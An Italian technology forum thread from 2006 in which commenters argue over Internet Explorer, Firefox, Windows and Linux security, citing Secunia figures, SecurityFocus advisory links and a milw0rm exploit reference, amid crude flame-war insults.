    gli "informatici" italioti vanno in brodo di giuggioleperche possono rubare il cinquantone alle zie e viverea scrocco, sverminando la fossa biologica chiamatavindovanche gli info-criminali di tutto il mondo, pagati percompiere attacchi di ogni genere e per divulgaremessaggi terroristici, etc, etc, vanno a nozze conla fossa bio-informatica di b. gatestanto i danni, alla fine, li paghiamo noi, e i pagliaccidi redmond, nonostante facciano prodotti schifosise la ridono alle nostre spallesi spera che il 31 la UE decida di fargli pagare almenoi 3 milioni di dollari al giorno a partire da dicembre scorso:sono pochi, ma sono qualcosa
  • Anonimo scrive:
    microsoft, tazza informatica
    bisogna ormai ammettere che questa aziendae' una vera e propria tazza, si, di quelle su cuici si siede per evacuare
  • Anonimo scrive:
    vinari cornuti e mazziati
    poveretti ! non gli resta che rosicare e sucare !!stravedono per la merdaccia piu schifosa dellastoria informatica e tra un po dovranno anchepagarla, questi morti di fame ahahahaha!!!!!!!!!!!!!!!!!!!!!!poveracci, fate proprio pena !!!!
    • Anonimo scrive:
      Re: vinari cornuti e mazziati
      - Scritto da: Anonimo
      poveretti ! non gli resta che rosicare e sucare !!
      stravedono per la merdaccia piu schifosa della
      storia informatica e tra un po dovranno anche
      pagarla, questi morti di fame

      ahahahaha!!!!!!!!!!!!!!!!!!!!!!
      poveracci, fate proprio pena !!!!Tornanete nel centro sociale okkupato dal quale sei uscito.
  • Anonimo scrive:
    IE Vs. Firefox
    Secondo Secunia il 25% delle 80 falle trovate tra il 2003 e il 2006 in IE sono ancora senza una patch.Secondo Secunia solo il 7% delle 27 falle trovate in firefox nello stesso periodo sono ancora aperte.Firefox ha meno falle in totale e meno falle aperte.(se vi interessa il 15% delle falle di IE sono estremamente gravi mentre solo il 4% di quelle di firefox lo sono altrettanto)Se volessimo per sbaglio confrontare Gentoo Vs Win XP la MS fa una figura veramente pessima, sempre secondo secunia infatti sia XP Home che Professional hanno rispettivamente 24 e 28 falle aperte e tra queste ce ne sono alcune marcate come Highly critical mentre Gentoo non ha nemmeno una falla non patchata.Non penso di poter essere accusato di essere un troll e non penso che si possa sostenere, numeri alla mano, che i software MS siano più sicuri del software libero.
    • Anonimo scrive:
      Re: IE Vs. Firefox
      - Scritto da: Anonimo
      Secondo Secunia il 25% delle 80 falle trovate tra
      il 2003 e il 2006 in IE sono ancora senza una
      patch.
      Secondo Secunia solo il 7% delle 27 falle trovate
      in firefox nello stesso periodo sono ancora
      aperte.
      Firefox ha meno falle in totale e meno falle
      aperte.La differenza sta nel fatto che non c'è interesse nel trovare falle per firefox perchè è un browser molto poco diffuso rispetto a IE, ma stai certo che di buffer overflow e remote code execution ce ne saranno eccome anche in FF.
      • Anonimo scrive:
        Re: IE Vs. Firefox
        e qui sbagli di nuovo. La maggiorparte della gente che usa IE fa parte della categoria utonti che non sa nemmeno come segnalare una vulnerabilita' o un bug e molto spesso non sanno distinguere un PC da una lavatrice. Considerando che anche gli esperti di Windows, sanno solo fare copia incolla, di gente che possa distinguere una vulnerabilita' da altro ce n'e' molto poca.X Firefox invece, gli utilizzatori spesso sono esperti, quindi a mio parere le segnalazioni per Firefox sono in numero molto maggiore.Poi, ovvio, tu da winaro inesperto e disinformato e diparte dirai che non e' vero ... ma e' cosi' mi spiace.
        • Anonimo scrive:
          Re: IE Vs. Firefox
          - Scritto da: Anonimo
          X Firefox invece, gli utilizzatori spesso sono
          espertirestate pure nella vostra elitè
          • Anonimo scrive:
            Re: IE Vs. Firefox

            restate pure nella vostra elitèma no! vedi che fraintendi sempre. Non mi sento superiore ... ci sono anche altri campi in cui una persona e' piu' preparata. Non necessariamente uno deve essere per forza preparato o conoscere l'informatica o branche di questa (ci sono altre facolta, universita' studi etc... medicina, chimica, lettere).Anche i burattinai sanno altri argomenti e conoscono altre cose piu' interessanti. Quello che da fastidio e' che molti di questi (burattinai, laureati in lettere, economia etc.) da un giorno all'altro diventano informatici e si sentono agl stessi livelli di gente che ha studiato la materia sudando cosi' come hanno fatto loro ma che a differenza di questi non si permettono di improvvisarsi medici, operai, farmacisti ecc.E si arriva sempre cosi' a confondere l'informatica con Windows, Word,Excel, giochini e solitario.
      • Anonimo scrive:
        Re: IE Vs. Firefox

        La differenza sta nel fatto che non c'è interesse
        nel trovare falle per firefox perchè è un browser
        molto poco diffuso rispetto a IE, ma stai certo
        che di buffer overflow e remote code execution ce
        ne saranno eccome anche in FF.Tieni anche conto del fatto che in FF (e in tutto il software libero) è più facile trovare falle visto che il codice sorgente è disponibile per tutti, per trovare una falla nei prodotti closed invece devi necessariamente applicatre un metodo euristico per individuare delle falle (ed è decisamente più difficile).Inoltre i dati di secunia dimostrano, oltre qualsiasi tendenza linara o windoziana, che nel sw libero i problemi rimasti senza patch sono quasi nulli rispetto alla controparte closed, è interessante confrontare, sempre su secunia, le falle aperte nelle varie distro linux con le falle aperte nelle varie versioni di windows.Non ho guardato tutte le distro ma le principali non arrivano ad avere 3 falle aperte e questo mi sembra un buon indice dell'impegno rivolto alla sicurezza.
        • Anonimo scrive:
          Re: IE Vs. Firefox
          - Scritto da: Anonimo
          Inoltre i dati di secunia dimostrano, oltre
          qualsiasi tendenza linara o windoziana, che nel
          sw libero i problemi rimasti senza patch sono
          quasi nulli rispetto alla controparte closed, è
          interessante confrontare, sempre su secunia, le
          falle aperte nelle varie distro linux con le
          falle aperte nelle varie versioni di windows.
          Non ho guardato tutte le distro ma le principali
          non arrivano ad avere 3 falle aperte e questo mi
          sembra un buon indice dell'impegno rivolto alla
          sicurezza.per forza le falle per i prodotti open source rimangono segrete nei vari bugtrack e rese pubbliche sui vari siti di sicurezza solo dopo che è in arrivo la patch. Mentre appena si scopre una falla per Windows o IE quella viene subito sventolata ai quattro venti, senza che Microsoft abbia il tempo di dare inizio ad un processo di patching. Si, perchè patchare non è una cosa semplice, non si patcha in 1 ora, occorre seguire un processo lungo e laborioso, onde evitare di aprire falle da un altra parte invece che coprirle
          • Anonimo scrive:
            Re: IE Vs. Firefox
            - Scritto da: Anonimo
            Mentre appena si scopre
            una falla per Windows o IE quella viene subito
            sventolata ai quattro venti, senza che Microsoft
            abbia il tempo di dare inizio ad un processo di
            patching. Si, perchè patchare non è una cosa
            semplice, non si patcha in 1 ora, occorre seguire
            un processo lungo e laborioso, onde evitare di
            aprire falle da un altra parte invece che
            coprirleAnche mesi e mesi...
          • Anonimo scrive:
            Re: IE Vs. Firefox
            ma come fai a dire certe cretinate. Le falle vengono segnalate immediatamente, anche su centinaia di siti lo stesso giorno.Tutte le segnalazioni sono pubbliche ... non so se ci hai fatto caso ... o fai finta di non saperlo perche' per forza vuoi avere la ragione.Se la vuoi te la do ... ma non ce l'hai. Mah.
          • Anonimo scrive:
            Re: IE Vs. Firefox
            - Scritto da: Anonimo
            ma come fai a dire certe cretinate. Le falle
            vengono segnalate immediatamente, anche su
            centinaia di siti lo stesso giorno.
            Tutte le segnalazioni sono pubbliche ... non so
            se ci hai fatto caso ... o fai finta di non
            saperlo perche' per forza vuoi avere la ragione.
            Se la vuoi te la do ... ma non ce l'hai. Mah.Falla in X Windows patchata il 20/21 marzo e pubblicata su security focus e su secunia solo il 20 marzohttp://www.securityfocus.com/bid/17169ma era nota sin dal 17 febbraio su CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0745 Phase Assigned (20060217)
          • Anonimo scrive:
            Re: IE Vs. Firefox
            - Scritto da: Anonimo
            ma come fai a dire certe cretinate. Le falle
            vengono segnalate immediatamente, anche su
            centinaia di siti lo stesso giorno.
            Tutte le segnalazioni sono pubbliche ... non so
            se ci hai fatto caso ... Falla in X Window di Linux patchata il 20/21 marzo e pubblicata su security focus e su secunia solo il 20 marzohttp://www.securityfocus.com/bid/17169 ma era nota sin dal 17 febbraio su CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0745 Phase Assigned (20060217)
  • Anonimo scrive:
    leggete bene
    http://www.pcopen.it/01NET/HP/0,1254,4_ART_68958,00.html
    • Anonimo scrive:
      Re: leggete bene
      http://blogs.technet.com/msrc/default.aspx(If you're using the new refresh of the IE7 Beta 2 Preview announced at Mix06, then you are not affected by the public report. You can download the preview at http://www.microsoft.com/windows/ie/ie7/default.mspx)
    • Anonimo scrive:
      Re: leggete bene

      "Anche la versione 7 beta è affetta dallo stesso
      problema."Altro articolo scritto da incompetenti.Infatti non è affatto vero che la versione 7 beta è affetta dallo stesso problema. Perchè l'ultima beta di IE7 rilasciata il 20 marzo pubblicamente sul sito Microsoft non è vulnerabile, come viene detto in maniera ufficiale anche da Microsoft stessa:http://blogs.technet.com/msrc/default.aspx(If you're using the new refresh of the IE7 Beta 2 Preview announced at Mix06, then you are not affected by the public report. You can download the preview at http://www.microsoft.com/windows/ie/ie7/default.mspx)
      • Anonimo scrive:
        Re: leggete bene

        Altro articolo scritto da incompetenti.L'articolo in questione si limita a citare secunia:"The vulnerability has also been confirmed in Internet Explorer 7 Beta 2 Preview (January edition). Other versions may also be affected."Amen
        • Anonimo scrive:
          Re: leggete bene
          - Scritto da: Anonimo
          L'articolo in questione si limita a citare
          secunia:

          "The vulnerability has also been confirmed in
          Internet Explorer 7 Beta 2 Preview (January
          edition). Other versions may also be affected."
          si ma chi scrive l'articolo avrebbe dovuto scrivere beta2 di gennaio, e informarsi che è uscita una nuova build pubblica a Marzo.http://www.securityfocus.com/bid/17196/discussMicrosoft has reported that this issue does not affect the March 20, 2006 release of Internet Explorer 7 Beta 2 Preview.
          • Anonimo scrive:
            Re: leggete bene

            avrebbe dovuto scrivere beta2 di gennaiostai tranquillo e abbi un attimo di pazienza:le falle gravi e enormi arriveranno presto anchesulla beta 354
          • Anonimo scrive:
            Re: leggete bene
            - Scritto da: Anonimo
            stai tranquillo e abbi un attimo di pazienza:
            le falle gravi e enormi arriveranno presto anche
            sulla beta 354come in qualsiasi altro browser internet.
          • Anonimo scrive:
            Re: leggete bene
            - Scritto da: Anonimo

            - Scritto da: Anonimo

            L'articolo in questione si limita a citare

            secunia:



            "The vulnerability has also been confirmed in

            Internet Explorer 7 Beta 2 Preview (January

            edition). Other versions may also be affected."



            si ma chi scrive l'articolo avrebbe dovuto
            scrivere beta2 di gennaio, e informarsi che è
            uscita una nuova build pubblica a Marzo.
            http://www.securityfocus.com/bid/17196/discuss

            Microsoft has reported that this issue does not
            affect the March 20, 2006 release of Internet
            Explorer 7 Beta 2 Preview.Ah... quindi la Microsoft sapeva della vulnerabilità, visto che l'ha corretta nella bete di IE7, e se ne è fregata per quanto riguarda IE6, che è la versione attuale ?
          • Anonimo scrive:
            Re: leggete bene
            - Scritto da: Anonimo

            - Scritto da: Anonimo



            - Scritto da: Anonimo


            L'articolo in questione si limita a citare


            secunia:





            "The vulnerability has also been confirmed in


            Internet Explorer 7 Beta 2 Preview (January


            edition). Other versions may also be
            affected."






            si ma chi scrive l'articolo avrebbe dovuto

            scrivere beta2 di gennaio, e informarsi che è

            uscita una nuova build pubblica a Marzo.

            http://www.securityfocus.com/bid/17196/discuss



            Microsoft has reported that this issue does not

            affect the March 20, 2006 release of Internet

            Explorer 7 Beta 2 Preview.

            Ah... quindi la Microsoft sapeva della
            vulnerabilità, visto che l'ha corretta nella bete
            di IE7, e se ne è fregata per quanto riguarda
            IE6, che è la versione attuale ?E che c'è di nuovo???
          • Anonimo scrive:
            Re: leggete bene
            - Scritto da: Anonimo

            - Scritto da: Anonimo



            - Scritto da: Anonimo





            - Scritto da: Anonimo



            L'articolo in questione si limita a citare



            secunia:







            "The vulnerability has also been confirmed
            in



            Internet Explorer 7 Beta 2 Preview (January



            edition). Other versions may also be

            affected."









            si ma chi scrive l'articolo avrebbe dovuto


            scrivere beta2 di gennaio, e informarsi che è


            uscita una nuova build pubblica a Marzo.


            http://www.securityfocus.com/bid/17196/discuss





            Microsoft has reported that this issue does
            not


            affect the March 20, 2006 release of Internet


            Explorer 7 Beta 2 Preview.



            Ah... quindi la Microsoft sapeva della

            vulnerabilità, visto che l'ha corretta nella
            bete

            di IE7, e se ne è fregata per quanto riguarda

            IE6, che è la versione attuale ?

            E che c'è di nuovo???Nulla, ma mi sbalordisce sempre il fatto che per qualcuno sia una cosa normale ed accettabile...
    • Anonimo scrive:
      Re: leggete bene
      ma veramente sei ancora quel vinaro che si limita a leggere rivistucce da bambini comprate in edicola?... e nonostante tutto crede di saperne piu' di un laureato? (dico laureato perche' i vinari copia-incolla sanno tutto)
  • Anonimo scrive:
    AHAHAAH WINBUG
    Dove è il nostro amico?
  • Anonimo scrive:
    MI CONSENTA
    Ma guarda un pò i troll da combattimento cosa avranno da replicare al cimitero dei bug esistenti riportato nel post: http://punto-informatico.it/forum/pol.asp?mid=1392627&tid=1392627&p=1&r=PImi consenta signor pinguazzo con la camicia a quadri di farle tre belle pernacchie in pieno stile nerd e complimentarmi per la lista nera, provvisoria, e poi venir a rompere i maroni all'Utente Win per un bug ogni tanto.Mi consenta signor piumato di ringraziarla di NON essere utente WIN. Ci guadagnamo tutti.linux, what's next bug today?
    • Trollfighter scrive:
      Re: MI CONSENTA
      - Scritto da: Anonimo
      linux, what's next bug today?Grandioso!!! Dovrebbero proiettare questo slogan quando Torwald fa i suoi comizi nei centri sociali.Mwahahahahah!
      • Anonimo scrive:
        Re: MI CONSENTA
        - Scritto da: Trollfighter

        - Scritto da: Anonimo


        linux, what's next bug today?
        come dicono a livorno:CI VOLE LA GHIGNA COME IL CULO(ci vuole la faccia come il sedere)
  • alex.tg scrive:
    Identita` della falla...
    A me sembra proprio la stessa riportata da milw0rm.Riassunto:PI riporta un link a http://secunia.com/advisories/18680 che a sua volta riporta "The vulnerability is caused due to an error in the processing of the "createTextRange() method call" , e che inoltre "Exploit code is out!" .E infatti l'exploit e` pubblicato, appunto, da milw0rm:http://www.milw0rm.com/exploits/1606e in cui l'ultima riga dello script menziona:var r = document.getElementById('blah'). createTextRange() ;proprio il metodo in questione.Ripeto, a me sembra lo stesso, a meno che non ci siano DUE falle leggermente diverse che entrambe chiamano in causa la chiamata a createTextRange.
    • Anonimo scrive:
      Re: Identita` della falla...
      - Scritto da: alex.tg
      A me sembra proprio la stessa riportata da
      milw0rm.
      chiamano in causa la chiamata a createTextRange.la falla riportata da milw0rm è quella di oggi del createTextRange, ma quella che PI ha pubblicato ieri invece era un altra e si trattata di un DoS causato da una incapacità di gestire molti eventi tipo OnClick che non hanno nulla a che vedere con il createTextRange.
  • Anonimo scrive:
    Valanghe di falle per Linux
    Linux Kernel SDLA IOCTL Unauthorized Local Firmware Access Vulnerability2006-03-24http://www.securityfocus.com/bid/16304 Linux Kernel DM-Crypt Local Information Disclosure Vulnerability2006-03-24http://www.securityfocus.com/bid/16301 Linux Kernel Sysctl_String Local Buffer Overflow Vulnerability2006-03-24http://www.securityfocus.com/bid/16141 Linux Kernel ProcFS Kernel Memory Disclosure Vulnerability2006-03-24http://www.securityfocus.com/bid/16284 Linux Kernel IP6_Input_Finish Remote Denial Of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16043 Linux Kernel Time_Out_Leases PrintK Local Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/15627 Linux Kernel ICMP_Push_Reply Remote Denial Of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16044 Linux Kernel handle_stop_signal Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16856 Linux Kernel IPv6 FlowLable Denial Of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/15729 Linux Kernel PTraced Child Auto-Reap Local Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/15625 Linux Kernel PTrace CLONE_THREAD Local Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/15642 Linux Kernel SET_MEMPOLICY Local Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16135 Linux Kernel mq_open System Call Unspecified Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16283 Linux Kernel Console Keymap Local Command Injection Vulnerability2006-03-24http://www.securityfocus.com/bid/15122 Linux Kernel Multiple Memory Leak Local Denial Of Service Vulnerabilities2006-03-23http://www.securityfocus.com/bid/15076 Linux Orinoco Driver Remote Information Disclosure Vulnerability2006-03-23http://www.securityfocus.com/bid/15085 Linux Kernel USB Subsystem Local Denial Of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/14955 Linux Kernel Multiple Security Vulnerabilities2006-03-23http://www.securityfocus.com/bid/15049 Linux Kernel 64-Bit SMP Routing_ioctl() Local Denial of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/14902 Linux Kernel IPV6 Local Denial of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/15156 Linux Kernel SCSI ProcFS Denial Of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/14790 Linux Kernel Sysctl Unregistration Local Denial of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/15365 Linux Kernel IPSec Policies Authorization Bypass Vulnerability2006-03-23http://www.securityfocus.com/bid/14609 Linux Kernel ISO File System Denial Of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/14614 Linux Kernel Sendmsg() Local Buffer Overflow Vulnerability2006-03-23http://www.securityfocus.com/bid/14785 Linux Kernel Multiple Vulnerabilities2006-03-23http://www.securityfocus.com/bid/12598 Linux Kernel Coda_Pioctl Local Buffer Overflow Vulnerability2006-03-23http://www.securityfocus.com/bid/14967 Linux Kernel USB io_edgeport Driver Local Integer Overflow Vulnerability2006-03-23http://www.securityfocus.com/bid/12102 Linux Kernel Ssockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities2006-03-23http://www.securityfocus.com/bid/17203 Linux Kernel die_if_kernel Local Denial of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/16993 ecc. ecc.:D
    • Anonimo scrive:
      Re: Valanghe di falle per Linux
      - Scritto da: Anonimo
      Linux Kernel SDLA IOCTL Unauthorized Local
      Firmware Access Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/16304

      Linux Kernel DM-Crypt Local Information
      Disclosure Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/16301

      Linux Kernel Sysctl_String Local Buffer Overflow
      Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/16141

      Linux Kernel ProcFS Kernel Memory Disclosure
      Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/16284

      Linux Kernel IP6_Input_Finish Remote Denial Of
      Service Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/16043

      Linux Kernel Time_Out_Leases PrintK Local Denial
      of Service Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/15627

      Linux Kernel ICMP_Push_Reply Remote Denial Of
      Service Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/16044

      Linux Kernel handle_stop_signal Denial of Service
      Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/16856

      Linux Kernel IPv6 FlowLable Denial Of Service
      Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/15729

      Linux Kernel PTraced Child Auto-Reap Local Denial
      of Service Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/15625

      Linux Kernel PTrace CLONE_THREAD Local Denial of
      Service Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/15642

      Linux Kernel SET_MEMPOLICY Local Denial of
      Service Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/16135

      Linux Kernel mq_open System Call Unspecified
      Denial of Service Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/16283

      Linux Kernel Console Keymap Local Command
      Injection Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/15122

      Linux Kernel Multiple Memory Leak Local Denial Of
      Service Vulnerabilities
      2006-03-23
      http://www.securityfocus.com/bid/15076

      Linux Orinoco Driver Remote Information
      Disclosure Vulnerability
      2006-03-23
      http://www.securityfocus.com/bid/15085

      Linux Kernel USB Subsystem Local Denial Of
      Service Vulnerability
      2006-03-23
      http://www.securityfocus.com/bid/14955

      Linux Kernel Multiple Security Vulnerabilities
      2006-03-23
      http://www.securityfocus.com/bid/15049

      Linux Kernel 64-Bit SMP Routing_ioctl() Local
      Denial of Service Vulnerability
      2006-03-23
      http://www.securityfocus.com/bid/14902

      Linux Kernel IPV6 Local Denial of Service
      Vulnerability
      2006-03-23
      http://www.securityfocus.com/bid/15156

      Linux Kernel SCSI ProcFS Denial Of Service
      Vulnerability
      2006-03-23
      http://www.securityfocus.com/bid/14790

      Linux Kernel Sysctl Unregistration Local Denial
      of Service Vulnerability
      2006-03-23
      http://www.securityfocus.com/bid/15365

      Linux Kernel IPSec Policies Authorization Bypass
      Vulnerability
      2006-03-23
      http://www.securityfocus.com/bid/14609

      Linux Kernel ISO File System Denial Of Service
      Vulnerability
      2006-03-23
      http://www.securityfocus.com/bid/14614

      Linux Kernel Sendmsg() Local Buffer Overflow
      Vulnerability
      2006-03-23
      http://www.securityfocus.com/bid/14785

      Linux Kernel Multiple Vulnerabilities
      2006-03-23
      http://www.securityfocus.com/bid/12598

      Linux Kernel Coda_Pioctl Local Buffer Overflow
      Vulnerability
      2006-03-23
      http://www.securityfocus.com/bid/14967

      Linux Kernel USB io_edgeport Driver Local Integer
      Overflow Vulnerability
      2006-03-23
      http://www.securityfocus.com/bid/12102

      Linux Kernel Ssockaddr_In.Sin_Zero Kernel Memory
      Disclosure Vulnerabilities
      2006-03-23
      http://www.securityfocus.com/bid/17203

      Linux Kernel die_if_kernel Local Denial of
      Service Vulnerability
      2006-03-23
      http://www.securityfocus.com/bid/16993

      ecc. ecc.

      :D

      /rosik
    • Trollfighter scrive:
      Re: Valanghe di falle per Linux
      - Scritto da: Anonimo
      Linux Kernel SDLA IOCTL Unauthorized Local[... una camionata di falle]Quoto tutto e godo come un maiale!
    • Anonimo scrive:
      Re: Valanghe di falle per Linux
      la valanga di falle per Windows non corrette?e quelle non annunciate?Suvvia non siate ironici.
    • Anonimo scrive:
      Re: Valanghe di falle per Linux
      AHAHHAHAH! E I LINARI DOVE SONO? NEGANO?RIDICOLI, TORNATEVENE NELLA CAMERETTA OKKUPATA ADIACENTE AL CENTRO SOCIALE.- Scritto da: Anonimo
      Linux Kernel SDLA IOCTL Unauthorized Local
      Firmware Access Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/16304

      Linux Kernel DM-Crypt Local Information
      Disclosure Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/16301

      Linux Kernel Sysctl_String Local Buffer Overflow
      Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/16141

      Linux Kernel ProcFS Kernel Memory Disclosure
      Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/16284

      Linux Kernel IP6_Input_Finish Remote Denial Of
      Service Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/16043

      Linux Kernel Time_Out_Leases PrintK Local Denial
      of Service Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/15627

      Linux Kernel ICMP_Push_Reply Remote Denial Of
      Service Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/16044

      Linux Kernel handle_stop_signal Denial of Service
      Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/16856

      Linux Kernel IPv6 FlowLable Denial Of Service
      Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/15729

      Linux Kernel PTraced Child Auto-Reap Local Denial
      of Service Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/15625

      Linux Kernel PTrace CLONE_THREAD Local Denial of
      Service Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/15642

      Linux Kernel SET_MEMPOLICY Local Denial of
      Service Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/16135

      Linux Kernel mq_open System Call Unspecified
      Denial of Service Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/16283

      Linux Kernel Console Keymap Local Command
      Injection Vulnerability
      2006-03-24
      http://www.securityfocus.com/bid/15122

      Linux Kernel Multiple Memory Leak Local Denial Of
      Service Vulnerabilities
      2006-03-23
      http://www.securityfocus.com/bid/15076

      Linux Orinoco Driver Remote Information
      Disclosure Vulnerability
      2006-03-23
      http://www.securityfocus.com/bid/15085

      Linux Kernel USB Subsystem Local Denial Of
      Service Vulnerability
      2006-03-23
      http://www.securityfocus.com/bid/14955

      Linux Kernel Multiple Security Vulnerabilities
      2006-03-23
      http://www.securityfocus.com/bid/15049

      Linux Kernel 64-Bit SMP Routing_ioctl() Local
      Denial of Service Vulnerability
      2006-03-23
      http://www.securityfocus.com/bid/14902

      Linux Kernel IPV6 Local Denial of Service
      Vulnerability
      2006-03-23
      http://www.securityfocus.com/bid/15156

      Linux Kernel SCSI ProcFS Denial Of Service
      Vulnerability
      2006-03-23
      http://www.securityfocus.com/bid/14790

      Linux Kernel Sysctl Unregistration Local Denial
      of Service Vulnerability
      2006-03-23
      http://www.securityfocus.com/bid/15365

      Linux Kernel IPSec Policies Authorization Bypass
      Vulnerability
      2006-03-23
      http://www.securityfocus.com/bid/14609

      Linux Kernel ISO File System Denial Of Service
      Vulnerability
      2006-03-23
      http://www.securityfocus.com/bid/14614

      Linux Kernel Sendmsg() Local Buffer Overflow
      Vulnerability
      2006-03-23
      http://www.securityfocus.com/bid/14785

      Linux Kernel Multiple Vulnerabilities
      2006-03-23
      http://www.securityfocus.com/bid/12598

      Linux Kernel Coda_Pioctl Local Buffer Overflow
      Vulnerability
      2006-03-23
      http://www.securityfocus.com/bid/14967

      Linux Kernel USB io_edgeport Driver Local Integer
      Overflow Vulnerability
      2006-03-23
      http://www.securityfocus.com/bid/12102

      Linux Kernel Ssockaddr_In.Sin_Zero Kernel Memory
      Disclosure Vulnerabilities
      2006-03-23
      http://www.securityfocus.com/bid/17203

      Linux Kernel die_if_kernel Local Denial of
      Service Vulnerability
      2006-03-23
      http://www.securityfocus.com/bid/16993

      ecc. ecc.

      :D
      • Anonimo scrive:
        9 --
      • Trollfighter scrive:
        5 --
      • Anonimo scrive:
        Re: Valanghe di falle per Linux
        - Scritto da: Anonimo
        AHAHHAHAH! E I LINARI DOVE SONO? NEGANO?
        RIDICOLI, TORNATEVENE NELLA CAMERETTA OKKUPATA
        ADIACENTE AL CENTRO SOCIALE.

        Eccone qua' uno!Sai capire il senso di tutte queste vulnerabilita'? Prova a sfruttarne una se ci riesci, dovresti prima di tutto venire da questa parte del monitor... (-;Il codice sorgente del kernel e' pubblico, tutte le vulnerabilita' trovate diventano pubbliche. Quello che vieni a sapere su windos e' quello che microsoft viene costretta a rivelare, e non ho idea quanti bug vengano chiusi come WONT FIX. Tu puoi dire zero, microsoft corregge tutte le falle trovate, io posso dire milioni, microsoft corregge solo le falle che gli fa' comodo e abbiamo ragione entrambi, chi e' che puo' dirlo se non si puo' vederne il codice?
        • Anonimo scrive:
          Re: Valanghe di falle per Linux
          E' che tu non hai fede. I winari accettano per fede che NON esistono falle in Windows, e sono i comunisti linari che sostengono che Windows sia bacato.E quando esce la finestrella sull'invio di informazioni a Redmond, loro cliccano "Invia" perché sono convinti che stanno dando una mano fondamentale al miglioramento di ics-pi.E quando RARAMENTE si blocca il computer, danno la colpa all'hardware, ai programmi, alle condizioni meteo... oppure sostengono che "it's not a bug, it's a feature". I più, d'altronde, neanche si accorgono dei blocchi, per quanto ci sono abituati.E a chi lo chiedesse: no, non rosico, ho la mia bella macchina Linux ma soprattutto ho la guardia alta contro tutto: è quest'ultima la prima difesa.
    • Anonimo scrive:
      Re: Valanghe di falle per Linux
      Le falle ci saranno sempre e comunque, in ogni OS"closed source" od "open source" che sia.L'importante è "tapparle" il più in fretta possibile.In ultima analisi, se non le "tappa" nessuno èl'amministratore di un sistema che dovrebbeesaminare il codice sorgente e provvedereda sé. Questa è ovviamente una cosa chenon possono fare tutti. Di sicuro ciò non èfattibile su un OS "closed source", comunque.
      • Anonimo scrive:
        Re: Valanghe di falle per Linux
        - Scritto da: Anonimo
        In ultima analisi, se non le "tappa" nessuno è
        l'amministratore di un sistema che dovrebbe
        esaminare il codice sorgente e provvedere
        da sé. Questa è ovviamente una cosa che
        non possono fare tutti. Di sicuro ciò non è
        fattibile su un OS "closed source", comunque.quanti amministratore di sistema sono in grado di tappare una falla da se? Le falle le tappano i ricercatori di sicurezza, non di certo gli amministratori di sistema
    • Anonimo scrive:
      Re: Valanghe di falle per Linux
      purtroppo ti capisco ... hai una mentalita' closed.Linux e' diverso da Vista... dove c'e' una fase di test etc prima di rilasciare il prodotto sul mercato.I vari aggiornamenti per Linux sono subito disponibili, e ci sono versioni del kernel in fase di test subito disponibili a tutti ... in modo che si possano correggere bug ed arrivare ad una versione stabile. L'elenco chilometrico che hai fatto per arrampicarti sul tuo specchio e' inutile.Ripeto, ti capisco. Hai una mentalita' closed.
      • Anonimo scrive:
        Re: Valanghe di falle per Linux
        - Scritto da: Anonimo
        Linux e' diverso da Vista... dove c'e' una fase
        di test etc prima di rilasciare il prodotto sul
        mercato.
        I vari aggiornamenti per Linux sono subito
        disponibili, e ci sono versioni del kernel in
        fase di test subito disponibili a tutti ... La stessa cosa la fa Microsoft con le versioni rilasciate ai betatester
        • Anonimo scrive:
          Re: Valanghe di falle per Linux
